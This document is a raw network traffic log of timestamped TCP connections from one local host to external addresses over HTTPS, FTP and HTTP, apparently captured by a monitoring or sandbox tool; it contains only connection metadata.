Nov 6, 2024 17:03:03.388138056 CET	443	50092	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.390485048 CET	50095	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.390537977 CET	443	50095	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.390619993 CET	50095	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.390914917 CET	50095	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.390937090 CET	443	50095	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.391470909 CET	50096	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.391485929 CET	443	50096	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.391544104 CET	50096	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.391649008 CET	50096	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.391659021 CET	443	50096	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.397733927 CET	443	50093	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.397913933 CET	443	50093	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.400816917 CET	50093	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.401173115 CET	50093	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.401200056 CET	443	50093	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.401213884 CET	50093	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.401221991 CET	443	50093	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.403342962 CET	50097	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.403378010 CET	443	50097	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.403445005 CET	50097	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.403717995 CET	50097	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:03.403732061 CET	443	50097	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:03.548172951 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:03.551290035 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:03.556303978 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:03.701250076 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:03.709415913 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:03.714637041 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:03.994502068 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:03.994751930 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:03.999631882 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:04.115386963 CET	443	50095	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.126301050 CET	50095	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.126343012 CET	443	50095	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.126791000 CET	50095	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.126800060 CET	443	50095	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.143500090 CET	443	50097	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.144268036 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:04.144442081 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:04.145463943 CET	50097	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.145479918 CET	443	50097	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.145915031 CET	50097	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.145920992 CET	443	50097	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.150028944 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:04.163309097 CET	443	50096	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.164458036 CET	50096	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.164491892 CET	443	50096	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.164864063 CET	50096	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.164869070 CET	443	50096	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.254997969 CET	443	50095	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.255459070 CET	443	50095	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.255675077 CET	50095	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.261585951 CET	50095	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.261621952 CET	443	50095	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.261636972 CET	50095	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.261643887 CET	443	50095	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.267827034 CET	50099	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.267889023 CET	443	50099	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.267998934 CET	50099	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.268136978 CET	50099	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.268150091 CET	443	50099	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.294661045 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:04.298115015 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:04.299279928 CET	443	50096	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.299417019 CET	443	50096	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.299463987 CET	443	50096	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.299530983 CET	50096	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.299565077 CET	50096	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.299583912 CET	443	50096	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.299595118 CET	50096	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.299599886 CET	443	50096	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.302767038 CET	50100	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.302813053 CET	443	50100	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.302882910 CET	50100	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.302927017 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:04.303217888 CET	50100	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.303227901 CET	443	50100	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.385931015 CET	443	50097	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.386007071 CET	443	50097	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.386181116 CET	50097	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.386274099 CET	50097	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.386295080 CET	443	50097	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.386307001 CET	50097	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.386312962 CET	443	50097	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.388751984 CET	50101	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.388812065 CET	443	50101	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.388879061 CET	50101	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.389027119 CET	50101	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:04.389041901 CET	443	50101	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:04.448101044 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:04.448419094 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:04.453356981 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:04.598160028 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:04.598654032 CET	50102	34028	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:04.603456020 CET	34028	50102	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:04.603517056 CET	50102	34028	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:04.603588104 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:04.608448029 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:05.002135992 CET	443	50099	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.002661943 CET	50099	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.002676010 CET	443	50099	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.003202915 CET	50099	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.003210068 CET	443	50099	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.025099039 CET	443	50100	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.025507927 CET	50100	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.025554895 CET	443	50100	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.026019096 CET	50100	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.026031971 CET	443	50100	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.126411915 CET	443	50101	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.127012014 CET	50101	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.127042055 CET	443	50101	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.127459049 CET	50101	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.127465010 CET	443	50101	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.132082939 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:05.132301092 CET	50102	34028	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:05.132380009 CET	50102	34028	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:05.132457018 CET	443	50099	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.132549047 CET	443	50099	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.132630110 CET	50099	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.132767916 CET	50099	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.132786036 CET	443	50099	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.132797956 CET	50099	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.132803917 CET	443	50099	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.135799885 CET	50103	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.135832071 CET	443	50103	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.135893106 CET	50103	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.136048079 CET	50103	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.136059046 CET	443	50103	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.137209892 CET	34028	50102	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:05.137914896 CET	34028	50102	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:05.137972116 CET	50102	34028	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:05.177158117 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:05.180679083 CET	443	50100	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.181086063 CET	443	50100	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.181154013 CET	50100	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.181236029 CET	50100	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.181258917 CET	443	50100	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.181272030 CET	50100	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.181276083 CET	443	50100	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.184799910 CET	50104	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.184845924 CET	443	50104	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.184907913 CET	50104	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.185053110 CET	50104	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.185065985 CET	443	50104	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.278944969 CET	21	50094	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:05.290524960 CET	443	50101	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.297632933 CET	443	50101	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.297693968 CET	443	50101	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.297694921 CET	50101	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.297734976 CET	50101	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.297823906 CET	50101	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.297844887 CET	443	50101	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.297858000 CET	50101	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.297864914 CET	443	50101	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.300570011 CET	50105	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.300617933 CET	443	50105	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.300674915 CET	50105	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.300803900 CET	50105	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:05.300820112 CET	443	50105	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:05.333415031 CET	50094	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:06.413796902 CET	443	50105	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.414361000 CET	50105	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.414391994 CET	443	50105	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.415158987 CET	50105	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.415178061 CET	443	50105	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.422497988 CET	443	50104	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.422913074 CET	50104	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.422939062 CET	443	50104	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.423363924 CET	50104	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.423368931 CET	443	50104	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.468859911 CET	443	50103	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.473871946 CET	50103	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.473891020 CET	443	50103	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.475014925 CET	50103	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.475020885 CET	443	50103	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.543574095 CET	443	50105	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.543658972 CET	443	50105	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.543713093 CET	50105	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.544047117 CET	50105	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.544074059 CET	443	50105	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.544085979 CET	50105	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.544092894 CET	443	50105	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.554080009 CET	443	50104	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.554156065 CET	443	50104	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.554192066 CET	443	50104	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.554215908 CET	50104	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.554266930 CET	50104	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.613159895 CET	50104	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.613181114 CET	443	50104	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.613192081 CET	50104	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.613197088 CET	443	50104	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.621499062 CET	50107	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.621556044 CET	443	50107	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.621611118 CET	50107	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.623013020 CET	50108	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.623034000 CET	443	50108	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.623091936 CET	50108	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.623225927 CET	50107	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.623254061 CET	443	50107	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.623442888 CET	50108	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.623451948 CET	443	50108	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.740031004 CET	443	50103	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.740120888 CET	443	50103	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.740219116 CET	50103	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.744625092 CET	50103	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.744647026 CET	443	50103	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.744658947 CET	50103	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.744664907 CET	443	50103	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.780303955 CET	50109	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.780353069 CET	443	50109	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:06.780412912 CET	50109	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.780653000 CET	50109	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:06.780667067 CET	443	50109	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.364078045 CET	443	50108	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.364867926 CET	443	50107	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.364886045 CET	50108	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.364913940 CET	443	50108	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.365566969 CET	50108	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.365572929 CET	443	50108	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.366905928 CET	50107	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.366940022 CET	443	50107	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.367507935 CET	50107	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.367512941 CET	443	50107	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.494457960 CET	443	50108	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.494523048 CET	443	50108	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.494580984 CET	50108	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.494929075 CET	50108	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.494940042 CET	443	50108	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.494960070 CET	50108	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.494963884 CET	443	50108	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.497263908 CET	50110	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.497273922 CET	443	50110	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.497441053 CET	50110	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.497637033 CET	50110	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.497648001 CET	443	50110	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.501822948 CET	443	50107	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.501898050 CET	443	50107	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.501952887 CET	50107	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.502185106 CET	50107	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.502197027 CET	443	50107	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.502209902 CET	50107	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.502214909 CET	443	50107	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.509314060 CET	443	50109	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.537658930 CET	50109	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.537703991 CET	443	50109	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.538438082 CET	50109	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.538448095 CET	443	50109	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.541584969 CET	50111	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.541615963 CET	443	50111	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.541832924 CET	50111	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.542445898 CET	50111	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.542459011 CET	443	50111	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.666002989 CET	443	50109	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.666071892 CET	443	50109	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.666192055 CET	50109	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.666208029 CET	443	50109	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.666271925 CET	50109	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.666625023 CET	50109	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.666646957 CET	443	50109	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.666661978 CET	50109	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.666667938 CET	443	50109	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.669143915 CET	50112	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.669179916 CET	443	50112	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.669423103 CET	50112	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.669583082 CET	50112	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:07.669598103 CET	443	50112	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:07.750349998 CET	56927	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:03:07.750778913 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:07.755762100 CET	80	56927	193.122.6.168	192.168.2.6
Nov 6, 2024 17:03:07.755819082 CET	56927	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:03:07.756302118 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:07.756373882 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:08.266438007 CET	443	50110	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.266917944 CET	50110	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.266935110 CET	443	50110	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.267359972 CET	50110	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.267369986 CET	443	50110	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.271399975 CET	443	50111	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.271774054 CET	50111	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.271790981 CET	443	50111	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.272243977 CET	50111	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.272248983 CET	443	50111	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.277299881 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:08.277585030 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:08.282454967 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:08.400527000 CET	443	50111	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.400626898 CET	443	50111	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.400676966 CET	50111	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.400898933 CET	50111	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.400911093 CET	443	50111	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.401348114 CET	443	50110	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.401422024 CET	443	50110	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.401487112 CET	50110	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.401667118 CET	50110	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.401675940 CET	443	50110	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.401702881 CET	50110	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.401706934 CET	443	50110	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.404572964 CET	50115	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.404582977 CET	443	50115	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.404655933 CET	50115	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.404771090 CET	50116	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.404807091 CET	443	50116	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.404869080 CET	50116	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.404913902 CET	50115	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.404927015 CET	443	50115	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.405035019 CET	50116	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.405050039 CET	443	50116	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.414031029 CET	443	50112	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.414418936 CET	50112	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.414429903 CET	443	50112	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.414895058 CET	50112	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.414905071 CET	443	50112	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.422110081 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:08.422483921 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:08.428368092 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:08.545373917 CET	443	50112	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.545459986 CET	443	50112	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.545612097 CET	50112	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.546049118 CET	50112	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.546073914 CET	443	50112	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.546087980 CET	50112	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.546093941 CET	443	50112	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.549154997 CET	50117	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.549200058 CET	443	50117	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.549382925 CET	50117	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.549772024 CET	50117	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:08.549792051 CET	443	50117	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:08.595705986 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:08.595901966 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:08.605310917 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:08.742561102 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:08.742691040 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:08.747952938 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:08.888961077 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:08.889298916 CET	50114	21	192.168.2.6	50.31.176.103
Nov 6, 2024 17:03:08.894067049 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:09.998716116 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:09.999053955 CET	21	50114	50.31.176.103	192.168.2.6
Nov 6, 2024 17:03:09.999152899 CET	50114	21	192.168.2.6	50.31.176.103
